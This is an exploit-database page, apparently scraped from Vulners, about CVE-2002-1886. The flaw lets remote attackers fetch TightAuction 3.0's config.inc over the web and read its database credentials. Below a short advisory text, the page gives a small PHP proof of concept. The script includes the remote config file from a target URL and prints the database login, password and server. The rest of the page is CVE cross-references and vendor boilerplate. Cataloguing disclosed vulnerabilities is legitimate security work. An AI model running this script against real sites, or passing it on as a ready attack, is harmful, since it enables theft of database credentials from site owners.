Lucene search
+L

TightAuction 3.0 - Config.INC Information Disclosure

🗓️ 02 Oct 2002 00:00:00Reported by frogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

TightAuction 3.0 has a vulnerability that exposes sensitive configuration data via web requests.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-1886
28 Jun 200504:00
cve
cvelist
Cvelist
CVE-2002-1886
28 Jun 200504:00
cvelist
euvd
EUVD
EUVD-2002-1865
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-1886
31 Dec 200205:00
nvd
redhatcve
RedhatCVE
CVE-2002-1886
21 May 202520:26
redhatcve
source: https://www.securityfocus.com/bid/5850/info

TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted.


<?
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer :
$DB_Database");
?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02839
31